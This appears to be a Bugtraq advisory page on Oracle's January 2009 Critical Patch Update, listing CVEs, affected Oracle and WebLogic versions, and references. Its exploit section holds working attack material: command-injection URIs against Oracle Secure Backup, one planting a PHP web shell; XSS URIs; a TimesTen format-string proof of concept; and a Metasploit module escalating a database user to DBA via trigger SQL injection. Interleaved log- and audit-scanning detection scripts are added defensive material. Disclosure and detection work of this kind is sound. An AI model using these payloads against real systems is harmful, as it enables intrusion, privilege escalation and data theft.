Written by Deniz Cevik of Intellect; Andy Davis of Information Risk Management Plc (IRM Plc); Esteban Martinez Fayo of Application Security, Inc.; Franz Huell of Red Database Security; Wasim Iqbal; Joxean Koret; Joxean Koret of TippingPoint (3com); Alexander Kornbrus
Wednesday, 18 February 2009 20:35
Oracle January 2009 Critical Patch Update Multiple Vulnerabilities
-\\Bugtraq ID: 33177
-\\Class: Unknown
-\\CVE: CVE-2008-2623 CVE-2008-4014 CVE-2008-4017 CVE-2008-5438 CVE-2008-5446 CVE-2008-5450 CVE-2008-5454 CVE-2008-5458 CVE-2008-5457 CVE-2008-5459 CVE-2008-5460 CVE-2008-5461 CVE-2008-5462 CVE-2008-3973 CVE-2008-3974 CVE-2008-3978 CVE-2008-3979 CVE-2008-3997 CVE-2008-3999 CVE-2008-4015 CVE-2008-5436 CVE-2008-5437 CVE-2008-5439 CVE-2008-5447 CVE-2008-4016 CVE-2008-3981 CVE-2008-4006 CVE-2008-5441 CVE-2008-5442 CVE-2008-5443 CVE-2008-5444 CVE-2008-5445 CVE-2008-5448 CVE-2008-5449 CVE-2008-4007 CVE-2008-5451 CVE-2008-5452 CVE-2008-5455 CVE-2008-5456 CVE-2008-5463 CVE-2008-5440
-\\Remote: Yes
-\\Local: Yes
-\\Published: Jan 08 2009 12:00AM
-\\Updated: Feb 18 2009 05:27PM
-\\Credit: Deniz Cevik of Intellect; Andy Davis of Information Risk Management Plc (IRM Plc); Esteban Martinez Fayo of Application Security, Inc.; Franz Huell of Red Database Security; Wasim Iqbal; Joxean Koret; Joxean Koret of TippingPoint (3com); Alexander Kornbrus
-\\Vulnerable:
Oracle TimesTen In-Memory Database 7.0.5.4.0
Oracle TimesTen In-Memory Database 7.0.5.3.0
Oracle TimesTen In-Memory Database 7.0.5.2.0
Oracle TimesTen In-Memory Database 7.0.5.1.0
Oracle Secure Backup 10.2.0.3
Oracle Secure Backup 10.2.0.2
Oracle Secure Backup 10.1.0.3
Oracle Secure Backup 10.1.0.2
Oracle Secure Backup 10.1.0.1
Oracle Oracle9i Standard Edition 9.2 .8DV
Oracle Oracle9i Standard Edition 9.2 .8
Oracle Oracle9i Personal Edition 9.2 .8DV
Oracle Oracle9i Personal Edition 9.2 .8
Oracle Oracle9i Enterprise Edition 9.2 .8DV
Oracle Oracle9i Enterprise Edition 9.2 .8
Oracle Oracle11g Standard Edition One 11.1 6
Oracle Oracle11g Standard Edition 11.1 6
Oracle Oracle11g Enterprise Edition 11.1 6
Oracle Oracle10g Standard Edition 10.2 .3
Oracle Oracle10g Standard Edition 10.2 .2
Oracle Oracle10g Standard Edition 10.1 .5
Oracle Oracle10g Standard Edition 10.2.0.4
Oracle Oracle10g Personal Edition 10.2 .3
Oracle Oracle10g Personal Edition 10.2 .2
Oracle Oracle10g Personal Edition 10.1 .5
Oracle Oracle10g Personal Edition 10.2.0.4
Oracle Oracle10g Enterprise Edition 10.2 .3
Oracle Oracle10g Enterprise Edition 10.2 .2
Oracle Oracle10g Enterprise Edition 10.1 .5
Oracle Oracle10g Enterprise Edition 10.2.0.4
Oracle Oracle10g Enterprise Edition 10.2.0.2 64 bit
Oracle Oracle10g Application Server 10.1.3 .3.0
Oracle Oracle10g Application Server 10.1.2 .2.0
Oracle Oracle10g Application Server 10.1.2.3.0
Oracle Enterprise Manager Grid Control 10g 10.2.0.4
Oracle E-Business Suite 12 12.0.6
Oracle E-Business Suite 11i 11.5.10.2
Oracle Collaboration Suite Release 1 10.1.2
BEA Systems Weblogic Server 8.1 SP 6
BEA Systems Weblogic Server 8.1 SP 5
BEA Systems Weblogic Server 8.1 SP 4
BEA Systems Weblogic Server 8.1 SP 3
BEA Systems Weblogic Server 8.1 SP 2
BEA Systems Weblogic Server 8.1 SP 1
BEA Systems Weblogic Server 8.1
BEA Systems Weblogic Server 7.0 .0.1 SP 4
BEA Systems Weblogic Server 7.0 .0.1 SP 3
BEA Systems Weblogic Server 7.0 .0.1 SP 2
BEA Systems Weblogic Server 7.0 .0.1 SP 1
BEA Systems Weblogic Server 7.0 .0.1
BEA Systems Weblogic Server 7.0 SP 7
BEA Systems Weblogic Server 7.0 SP 6
BEA Systems Weblogic Server 7.0 SP 5
BEA Systems Weblogic Server 7.0 SP 4
BEA Systems Weblogic Server 7.0 SP 3
BEA Systems Weblogic Server 7.0 SP 2
BEA Systems Weblogic Server 7.0 SP 1
BEA Systems Weblogic Server 7.0
    - HP HP-UX 11.0
    - HP HP-UX 11i v1
    - IBM AIX 4.3.3
    - Microsoft Windows 2000 Advanced Server SP2
    - Microsoft Windows 2000 Advanced Server SP1
    - Microsoft Windows 2000 Advanced Server
    - Microsoft Windows 2000 Datacenter Server SP2
    - Microsoft Windows 2000 Datacenter Server SP1
    - Microsoft Windows 2000 Datacenter Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows NT Enterprise Server 4.0 SP6a
    - Microsoft Windows NT Enterprise Server 4.0 SP6
    - Microsoft Windows NT Enterprise Server 4.0 SP5
    - Microsoft Windows NT Enterprise Server 4.0 SP4
    - Microsoft Windows NT Server 4.0 SP6a
    - Microsoft Windows NT Server 4.0 SP6
    - Microsoft Windows NT Server 4.0 SP5
    - Microsoft Windows NT Server 4.0 SP4
    - Microsoft Windows NT Workstation 4.0 SP6a
    - Microsoft Windows NT Workstation 4.0 SP6
    - Microsoft Windows NT Workstation 4.0 SP5
    - Microsoft Windows NT Workstation 4.0 SP4
    - RedHat Linux 7.1 i386
    - RedHat Linux 6.2 i386
    - Sun Solaris 8
    - Sun Solaris 2.7_sparc
    - Sun Solaris 2.6_sparc
BEA Systems Weblogic Server 9.2 Maintenance Pack
BEA Systems Weblogic Server 9.2
BEA Systems Weblogic Server 9.1
BEA Systems Weblogic Server 9.0
BEA Systems Weblogic Server 7.0 SP7
BEA Systems Weblogic Server 10.3
BEA Systems Weblogic Server 10.0 MP1
BEA Systems Weblogic Server 10.0
BEA Systems WebLogic Portal 8.1 SP6
BEA Systems WebLogic Portal 8.1 SP5
BEA Systems WebLogic Portal 8.1 SP4
BEA Systems WebLogic Portal 8.1 SP3
BEA Systems WebLogic Portal 8.1 SP2
BEA Systems WebLogic Portal 8.1 SP1
BEA Systems WebLogic Portal 8.1
BEA Systems WebLogic Portal 9.2 MP3
BEA Systems WebLogic Portal 9.2
BEA Systems WebLogic Portal 10.3
BEA Systems WebLogic Portal 10.2
BEA Systems WebLogic Portal 10.0 MP1
BEA Systems WebLogic Portal 10.0
-\\Discussion Oracle has released the January 2009 critical patch update. The update addresses 41 vulnerabilities affecting the following software:
Oracle Database
Oracle Secure Backup
Oracle TimesTen In-Memory Database
Oracle Application Server
Oracle Collaboration Suite
Oracle E-Business Suite Release
Oracle Enterprise Manager Grid Control
PeopleSoft Enterprise HRMS
JD Edwards Tools
Oracle WebLogic Server (formerly BEA WebLogic Server)
Oracle WebLogic Portal (formerly BEA WebLogic Portal)
-\\Exploit(s)/PoC(s): Some of these issues may not require specific exploit code and may be trivial to exploit.
Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product for the issue documented by CVE-2008-5449. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following proof-of-concept URIs are available for Oracle Secure Backup:
1. Create a file in the directory "c:\":
https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+hello+world+%3E+c:\oracle.secure.backup.txt+;
2. Create a PHP backdoor:
https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+%22%3C%3Fphp+print(shell_exec(%24_GET%5B'a'%5D))%3B+%3F%3E%22+%3E+test.php%3B%26%26+echo
The following example URI is available for the Oracle Application Server portal:
http://www.example.com/sso/jsp/login.jsp?site2pstoretoken=XSS PORTAL&search_type=XSS
The following example URI is available for Oracle Forms:
http://www.example.com/ifcgi60.exe?form=XSS
The following exploit and proof of concept are available:
===============================================================
CVE-2008-5440.py
^^^^^^^^^^^^^^^^^
#!/usr/bin/python
"""
Oracle TimesTen Remote Format String (Fixed in Oracle CPU Jan 2009)
Copyright (c) Joxean Koret 2009
"""
import sys
import socket

def testPoc(host):
    # Connect to the TimesTen daemon listener on TCP port 17000
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, 17000))
    # The msg parameter of evtdump reaches a printf-style call unsanitised;
    # %25 decodes to a literal %, so the server sees "AAAA%n"
    buf = "GET evtdump?msg=AAAA%25n HTTP/1.0\r\n\r\n"
    print "Sending: %s" % buf
    s.send(buf)
    print s.recv(4096)
    s.close()

if __name__ == "__main__":
    if len(sys.argv) == 1:
        print "Usage:", sys.argv[0], "<target host>"
        print
        sys.exit(1)
    else:
        testPoc(sys.argv[1])
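The request shapes in the Secure Backup URIs and the TimesTen PoC above are easy to pick out of web-server access logs. The following log check is an added example, not part of the advisory or of the quoted PoCs: the log lines it scans are constructed, the regular expressions and finding labels are my own, and only the paths and parameter names (/login.php with rbtool, /evtdump with msg, /sso/jsp/login.jsp, /ifcgi60.exe) come from the URIs quoted above.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (not from the advisory). The request targets
# mirror the proof-of-concept URIs quoted in the Bugtraq entry; the client
# addresses, timestamps and status codes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jan/2009:10:01:02 +0000] "GET /login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+hello+%3E+c:\\osb.txt+; HTTP/1.1" 200 512
10.0.0.6 - - [13/Jan/2009:10:01:05 +0000] "GET /login.php?button=Login&uname=admin HTTP/1.1" 200 1024
10.0.0.7 - - [13/Jan/2009:10:02:11 +0000] "GET /evtdump?msg=AAAA%25n HTTP/1.0" 500 0
10.0.0.8 - - [13/Jan/2009:10:03:00 +0000] "GET /sso/jsp/login.jsp?site2pstoretoken=%3Cb%3EXSS%3C/b%3E&search_type=XSS HTTP/1.1" 200 300
10.0.0.9 - - [13/Jan/2009:10:04:00 +0000] "GET /evtdump?msg=hello HTTP/1.0" 200 20
10.0.0.9 - - [13/Jan/2009:10:05:00 +0000] "GET /ifcgi60.exe?form=orders HTTP/1.1" 200 900
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SHELL_META = re.compile(r'[;&|`$<>]|\.exe\b', re.I)   # command-injection tell-tales
FMT_DIRECTIVE = re.compile(r'%\d*\$?[nxXsp]')          # printf directives after URL decoding
HTML_META = re.compile(r'[<>"\']')                      # markup in a reflected parameter

def parse_query(query):
    """Split a raw query string on '&' only. parse_qs on older Pythons also
    splits on ';', which would hide the trailing ';' in the rbtool payload."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def classify(target):
    """Return finding labels for one request target ([] when nothing matches)."""
    parts = urlsplit(target)
    path, params = parts.path.lower(), parse_query(parts.query)
    findings = []
    # Oracle Secure Backup admin server: rbtool is the parameter the PoC URIs abuse
    if path.endswith("/login.php") and any(SHELL_META.search(v) for v in params.get("rbtool", [])):
        findings.append("osb-rbtool-command-injection")
    # TimesTen evtdump: a format directive in msg (%25n decodes to %n) is the bug's signature
    if path.endswith("/evtdump") and any(FMT_DIRECTIVE.search(v) for v in params.get("msg", [])):
        findings.append("timesten-evtdump-format-string")
    # Application Server SSO login page and Forms CGI: markup in the parameters the advisory names
    xss_params = {"/sso/jsp/login.jsp": ("site2pstoretoken", "search_type"), "/ifcgi60.exe": ("form",)}
    for suffix, names in xss_params.items():
        if path.endswith(suffix) and any(HTML_META.search(v) for n in names for v in params.get(n, [])):
            findings.append("reflected-markup-in-parameter")
    return findings

def scan_log(text):
    """Return (client ip, request target, labels) for every flagged log line."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if m:
            labels = classify(m.group("target"))
            if labels:
                hits.append((m.group("ip"), m.group("target"), labels))
    return hits
```

Run scan_log over a real access log and review the flagged lines; the format-directive check will also flag harmless values such as "100%sure", so treat it as a triage signal rather than a verdict.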
===============================================================
33177_droptable_trigger.rb
^^^^^^^^^^^^^^^^^^^^^^^^^^^
##
# $Id: droptable_trigger.rb
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger.',
      'Description'    => %q{
        This module will escalate a Oracle DB user to MDSYS by exploiting an sql
        injection bug in the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit
        escalate user to DBA using "CREATE ANY TRIGGER" privilege given to MDSYS
        user by creating evil trigger in system scheme (2-stage attack).
      },
      'Author'         => [ 'Sh2kerr <research[ad]dsec.ru>' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision:$',
      'References'     =>
        [
          [ 'CVE', '2008-3979' ],
          [ 'URL', 'http://www.securityfocus.com/archive/1/500061' ],
          [ 'URL', 'http://www.ngssoftware.com/' ],
        ],
      'DisclosureDate' => 'Jan 13 2009'))

    register_options(
      [
        OptString.new('SQL',        [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']),
        OptString.new('USER',       [ false, 'The current user. ', 'SCOTT']),
        OptString.new('FILENAME',   [ false, 'The file name.', 'msf.sql']),
        OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
      ], self.class)
  end

  def run
    # Random upper-case names for the helper procedure, the helper function and
    # the PL/SQL variables, so the generated script does not use fixed strings
    name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    rand4 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    rand5 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

    # Procedure that runs the configured SQL with the caller's rights (stage 2 payload)
    function1 = %Q|
      CREATE OR REPLACE PROCEDURE #{name1} AUTHID CURRENT_USER AS
        PRAGMA AUTONOMOUS_TRANSACTION;
      BEGIN
        EXECUTE IMMEDIATE '#{datastore['SQL']}';
      END;
    |

    # Function called from inside the MDSYS trigger; it creates the trigger in the
    # SYSTEM schema that invokes #{name1} on insert into DEF$_TEMP$LOB (stage 1 payload)
    function2 = %Q|
      CREATE OR REPLACE FUNCTION #{name2} RETURN number AUTHID CURRENT_USER is
        PRAGMA AUTONOMOUS_TRANSACTION;
        STMT VARCHAR2(400):= 'create or replace trigger system.evil_trigger before insert on system.DEF$_TEMP$LOB DECLARE msg VARCHAR2(10); BEGIN #{datastore['USER']}.#{name1}; end evil_trigger;';
      BEGIN
        EXECUTE IMMEDIATE STMT;
        COMMIT;
        RETURN 1;
      END;
    |

    # The quoted table name carries the injection; dropping the table fires the trigger
    prepare     = "create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)"
    exploiting1 = "drop table \"O' and 1=#{datastore['USER']}.#{name2}--\""
    exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')"

    # Base64-encode every statement so the script carries no quoting problems
    fun1 = Rex::Text.encode_base64(function1)
    fun2 = Rex::Text.encode_base64(function2)
    prp  = Rex::Text.encode_base64(prepare)
    exp1 = Rex::Text.encode_base64(exploiting1)
    exp2 = Rex::Text.encode_base64(exploiting2)

    sql = %Q|
      DECLARE
        #{rand1} VARCHAR2(32767);
        #{rand2} VARCHAR2(32767);
        #{rand3} VARCHAR2(32767);
        #{rand4} VARCHAR2(32767);
        #{rand5} VARCHAR2(32767);
      BEGIN
        #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun1}')));
        EXECUTE IMMEDIATE #{rand1};
        EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name1} TO PUBLIC';
        #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun2}')));
        EXECUTE IMMEDIATE #{rand2};
        EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name2} TO PUBLIC';
        #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
        EXECUTE IMMEDIATE #{rand3};
        #{rand4} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
        EXECUTE IMMEDIATE #{rand4};
        #{rand5} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp2}')));
        EXECUTE IMMEDIATE #{rand5};
      END;
      /
      DROP PROCEDURE #{name1};
      DROP FUNCTION #{name2};
    |

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sql)
  end

end
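On the database side the two stages of the module above leave distinct traces in the audit trail: a CREATE or DROP TABLE on a quoted identifier that contains a string delimiter or a comment sequence, and a CREATE TRIGGER against the SYSTEM schema issued by a session that does not own it. The following audit-trail review is an added example, not part of the advisory or of the Metasploit module; the records it reviews are constructed, and the function and label names are my own.

```python
import re

# Constructed audit-trail style records (not from the advisory): (session user, SQL text).
# The first three mirror the statements the module generates; the last two are benign.
SAMPLE_AUDIT = [
    ("SCOTT", 'create table "O\' and 1=SCOTT.ABCD--"(id number)'),
    ("SCOTT", 'drop table "O\' and 1=SCOTT.ABCD--"'),
    ("SCOTT", "create or replace trigger system.evil_trigger before insert on system.DEF$_TEMP$LOB BEGIN SCOTT.P; end;"),
    ("HR", 'create table "Employee Archive 2009"(id number)'),
    ("HR", "drop table old_data"),
]

QUOTED_IDENT = re.compile(r'"((?:[^"]|"")*)"')                        # Oracle quoted identifier
DDL_TABLE = re.compile(r'^\s*(create|drop)\s+table\b', re.I)
TRIGGER_DDL = re.compile(r'^\s*create\s+(?:or\s+replace\s+)?trigger\s+(\w+)\.', re.I)
PRIVILEGED = {"SYS", "SYSTEM", "MDSYS"}

def suspicious_identifiers(sql):
    """Return quoted identifiers in a CREATE/DROP TABLE statement that carry a
    single quote or a comment sequence. Such names are legal Oracle identifiers,
    but they break out of the string literal the MDSYS.SDO_TOPO_DROP_FTBL
    trigger embeds the table name in, which is the injection the module uses."""
    if not DDL_TABLE.match(sql):
        return []
    return [m for m in QUOTED_IDENT.findall(sql) if re.search(r"'|--|/\*", m)]

def cross_schema_trigger(user, sql):
    """Return the target schema when a session creates a trigger in a privileged
    schema it does not own (stage two: the trigger planted under SYSTEM)."""
    m = TRIGGER_DDL.match(sql)
    if m and m.group(1).upper() != user.upper() and m.group(1).upper() in PRIVILEGED:
        return m.group(1).upper()
    return None

def review_audit(records):
    """Return (user, label, detail) findings for a list of (user, sql) records."""
    findings = []
    for user, sql in records:
        for ident in suspicious_identifiers(sql):
            findings.append((user, "metachar-in-table-name", ident))
        schema = cross_schema_trigger(user, sql)
        if schema:
            findings.append((user, "trigger-in-privileged-schema", schema))
    return findings
```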
-\\Solution Oracle has released CPUJan2009 (Critical Patch Update January 2009) to address these issues. Contact the vendor for details on obtaining and applying the appropriate updates.
-\\Reference(s)
--ACROS Security Problem Report #2009-01-27-1 http://www.acrossecurity.com/aspr/ASPR-2009-01-27-1-PUB.tx (ACROS)
--Assurent VR - Oracle BEA WebLogic Server Apache Connector Buffer Overflow msg://bugtraq/ (Assurent)
--CVE-2008-5446 Sensitive Information Disclosure http://secniche.org/papers/orabs.pd (SecNiche)
--Oracle Critical Patch Update - January 2009 - E-Business Suite Impact http://www.integrigy.com/security-resources/analysis/Integrigy-Oracle-CPU-January-2009-Analysis.pdf/vie (Integrigy)
--Oracle Database 10g R2 Summary Advisor Arbitrary File Rewrite Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=76 (iDefense Labs)
--Oracle Homepage http://www.oracle.co (Oracle)
--Oracle Secure Backup 10g Remote Code Execution http://joxeankoret.com/blog/?p=3 (Joxean Koret)
--Oracle Secure Backup Administration Server login.php Command Injection Vulnerabi http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=76 (iDefense)
--Oracle Secure Backup Administration Server login.php Command Injection Vulnerabi msg://bugtraq/ (iDefense)
--Oracle Secure Backup Administration Server login.php Command Injection Vulnerabi http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=76 (iDefense Labs)
--ACROS Security: HTML Injection in BEA (Oracle) WebLogic Server Console (ASPR #20 http://www.securityfocus.com/archive/1/50040 (ACROS Security)
--Advisory: Oracle EBusiness Suite Sensitive Information Disclosure http://www.securityfocus.com/archive/1/50017 (SecNiche)
--Advisory: Oracle EBusiness Suite Sensitive Information Disclosure Vulnerability http://www.securityfocus.com/archive/1/50017 (Aditya K Sood)
--iDefense Security Advisory 01.13.09: Oracle Database 10g R2 Summary Advisor Arbi http://www.securityfocus.com/archive/1/50005 (iDefense Labs)
--iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration Server http://www.securityfocus.com/archive/1/50005 (iDefense Labs)
--Oracle Application Server 10g Cross Site Scripting Vulnerability http://www.securityfocus.com/archive/1/50053
--Oracle CPU Jan 2009 Advisories http://www.securityfocus.com/archive/1/50006 (Alexandr Polyakov)
--Oracle Forms Cross site Scripting in (iFcgi60.exe / f60servlet) http://www.securityfocus.com/archive/1/50053
--Oracle Secure Backup 10g Remote Code Execution http://www.securityfocus.com/archive/1/50007 (Joxean Koret)
--Oracle Secure Backup Multiple Denial Of Service vulnerabilities http://www.securityfocus.com/archive/1/50011
--Oracle Secure Backup NDMP_CONECT_CLIENT_AUTH Command Buffer Overflow Vulnerabili http://www.securityfocus.com/archive/1/50011
--Oracle Secure Backup's observiced.exe Denial Of Service vulnerability http://www.securityfocus.com/archive/1/50011
--Oracle TimesTen Remote Format String http://www.securityfocus.com/archive/1/50008 (Joxean Koret)
--Re: iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration Ser http://www.securityfocus.com/archive/1/50011 (security curmudgeon)
--Team SHATTER Security Advisory: Oracle Database Buffer Overflow in SYS.OLAPIMPL_ http://www.securityfocus.com/archive/1/50063 (Shatter)
--Team SHATTER Security Advisory: SQL Injection in Oracle Enterprise Manager http://www.securityfocus.com/archive/1/50062 (Shatter)
--Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2 http://www.securityfocus.com/archive/1/50006 (David Litchfield)
--ZDI-09-003: Oracle Secure Backup exec_qr() Command Injection Vulnerability http://www.securityfocus.com/archive/1/50007
--ZDI-09-004: Oracle TimesTen evtdump Remote Format String Vulnerability http://www.securityfocus.com/archive/1/50007
--Oracle Critical Patch Update Advisory - January 2009 http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.htm (Oracle)
--Oracle Critical Patch Update Pre-Release Announcement - January 2009 http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.htm (Oracle)
--Oracle TimesTen Remote Format String http://joxeankoret.com/blog/?p=4 (Joxean Koret)
--SECURITY ADVISORY (CVE-2008-5457) https://support.bea.com/application_content/product_portlets/securityadvisories/2809.htm (BEA)
--SECURITY ADVISORY (CVE-2008-5459) https://support.bea.com/application_content/product_portlets/securityadvisories/2807.htm (BEA)
--SECURITY ADVISORY (CVE-2008-5460) https://support.bea.com/application_content/product_portlets/securityadvisories/2810.htm (BEA)
--SECURITY ADVISORY (CVE-2008-5461) https://support.bea.com/application_content/product_portlets/securityadvisories/2811.htm (BEA)
--SECURITY ADVISORY (CVE-2008-5462) https://support.bea.com/application_content/product_portlets/securityadvisories/2808.htm (BEA)
--ZDI-09-003 Oracle Secure Backup exec_qr() Command Injection Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-003 (ZDI)
--ZDI-09-004 Oracle TimesTen evtdump Remote Format String Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-004 (ZDI)